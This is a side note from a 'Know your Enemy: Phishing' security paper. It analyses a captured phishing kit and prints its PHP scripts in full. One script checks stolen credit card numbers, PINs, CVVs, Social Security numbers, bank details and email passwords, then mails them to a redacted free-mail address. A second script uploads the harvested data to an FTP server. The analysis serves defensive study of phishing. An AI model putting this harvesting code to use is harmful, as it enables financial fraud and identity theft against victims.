Know your Enemy: Phishing

In this side note we analyse an example script that used to validate the information entered by users into a HTML form on a phishing web site. Initially the input data is checked to ensure that the submitted strings are valid. For example, the PIN should be four characters long and the username should not contain certain words. If the entered data passes this check, the script constructs an e-mail message containing the user's information and sends it to an address at a free e-mail provider. Finally, the location bar of the browser is updated to point to the file xxxxISAPI.dll (the file name has been obfuscated). This page will display a confirmation for the victim. In addition, a script was also included that could be used to transfer the phished information to an FTP server.

<?php
$errchk=0;
$error = "None";
$badw="fuck pussy dick suck asshole";

//Checking for errors in the post:
//1 - CC nr:
if(strlen($ccnumber)<16){
	$error="Invalid credit card number, please re-submit.";
	$errchk=1;
}
else if(strlen($ccnumber)>16&&$ccnumber{16}!=' '){
	$error="Invalid credit card number, please re-submit.";
	$errchk=1;
}
//2 - Email syntax:
else if(strstr($email, '@') == FALSE){
	$error="Invalid email address, please re-submit.";
	$errchk=2;
}
//3 - Routing number (if it does exist)
else if(strlen($bankr)>0 && strlen($bankr)<9){
	$error="Invalid bank routing number, please re-submit.";
	$errchk=3;
}
//4 - CVV2 check
else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){
	$error="Invalid card validation code, please re-submit.";
	$errchk=4;
}

//4 - PIN check
else if(strlen($ccp)!=4&&strlen($ccp)!=4){
	$error="Invalid pin number, please re-submit.";
	$errchk=4;
}
//5 fields that should exist:
else if(strlen($username)<1){
	$error="Please enter your full name and re-submit.";
	$errchk=5;
}
else if(strlen($streetaddr)<1){
	$error="Please enter your address and re-submit.";
	$errchk=5;
}
else if(strlen($cityaddr)<1){
	$error="Please enter your city and re-submit.";
	$errchk=5;
}
else if(strlen($mmn)<1){
	$error="Please enter your Mother Maiden Name and re-submit.";
	$errchk=5;
}
else if(strlen($month)<1 || strlen($day)<1 || strlen($year)<1 ){
	$error="Please enter your Date Of Birth and re-submit.";
	$errchk=5;
}
//6 - Bad words check
else if(stristr($badw,$username)){
	$error="ERROR - Invalid user name or password.";
	$errchk=6;
}
else if(stristr($badw,$streetaddr)){
	$error="ERROR - Invalid user name or password.";
	$errchk=6;
}
else if(stristr($badw,$cityaddr)){
	$error="ERROR - Invalid user name or password.";
	$errchk=6;
}
else if(stristr($badw,$mmn)){
	$error="ERROR - Invalid user name or password.";
	$errchk=6;
}
//More coming soon:)
//If no error:
if($errchk==0) {
	$efile=fopen("/tmp/User.doc","r");
	fscanf($efile,"%s",$userid);
	fscanf($efile,"%s",$pass);
	fclose($efile);
	$timed = date ("l dS of F Y h:i:s A");
	$ip = $_SERVER["REMOTE_ADDR"];
	$message="----------------------------------------------------------------------------
	On $timed the user ($ip) wrote:
	CreditCard Number - $ccnumber ; Month - $month ; Day - $day ; Year - $year";

	$message=$message."UserId - $userid";

	$message=$message."Password - $pass";

	$message=$message."Email - $email";

	$message=$message."Email Password - $emailp";

	$message=$message."Full Name - $username";

	$message=$message."Address - $streetaddr";

	$message=$message."City - $cityaddr";

	$message=$message."State - $stateprovaddr";

	$message=$message."Zip Code - $zipcodeaddr";

	$message=$message."Phone number - $phone";

	$message=$message."Country - $countryaddr";

	$message=$message."CVV - $cvv2";

	$message=$message."Bank Name - $bank";

	$message=$message."Bank Routing # - $bankr
		Checking Account # - $bankc
		Social Security Number - $ssn
		Card PIN Number - $ccp
		Mother's Maiden Name - $mmn
		Date of Birth - $pibirthdatemm $pibirthdatedd $pibirthdateyy
		Driver Licence Number - $dln";

	mail ("xxxxxx@hotmail.com","xxEBAYxx","$message","From:  tzonfi <xxxxxx@xxxxxx.com>\n");

	header ("Location:xxxxISAPI.dll");
	//$muie = fopen("/tmp/eb.txt", "a");
	//fwrite($muie, $message);
	//fclose($muie);
	//include("cc-ftp.php");
	exit();
}
else {
	echo $error;
}
?>

The script cc-ftp.php (commented out in the data processing script above) will transfer the input to an FTP server:

<?php
include("r-config.php");
// the server login information
$fcon = ftp_connect($host);
if(@ftp_login($fcon, $user, $pass)) {
	ftp_put($fcon, $fremote, $flocal, FTP_ASCII);
}
else {
	$msg = "Unable to connect to host: $host with user: $user and pass: $pass.
		Please update me.";
	mail ("xxxxxx@xxxxxx","Ftpupdate","$msg","From:jmekeru <xxxxxx@xxxxxx>\n");
}
ftp_close($fcon);
?>

Click here to return to the main paper.

Know your Enemy:Phishing

How phishing-data is checked and transmited

Know your Enemy:
Phishing